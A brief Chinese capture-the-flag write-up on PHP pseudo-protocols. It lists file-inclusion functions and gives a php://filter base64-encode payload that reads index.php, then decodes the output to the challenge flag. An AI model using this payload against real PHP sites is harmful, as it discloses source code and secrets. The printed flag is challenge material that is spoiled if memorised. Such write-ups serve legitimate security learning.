感觉毫无头绪e一下,发现要使用伪协议
伪协议:是PHP自己支持的一种协议与封装协议,简单说就是PHP定义的一种特殊访问资源的方法。
2.什么时候用PHP伪协议?
可能遇到的文件包含函数:
1、include
2、require
3、include_once
4、require_once
5、highlight_file
6、show_source
7、flie
8、readfile
9、file_get_contents
10、file_put_contents
11、fopen (比较常见)
根据上述内容构造:
/file=php://filter/read=convert.base64-encode/resource=index.php
得到的内容变为base64编码
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NjY1ZWIxOGEtNTA4Ni00ZTUzLTk5YzEtNmE1N2YwZDVmMDgwfQo=
放入随波逐流一键解码
flag{665eb18a-5086-4e53-99c1-6a57f0d5f080}
参考文章:⭐️PHP伪协议详解-CSDN博客
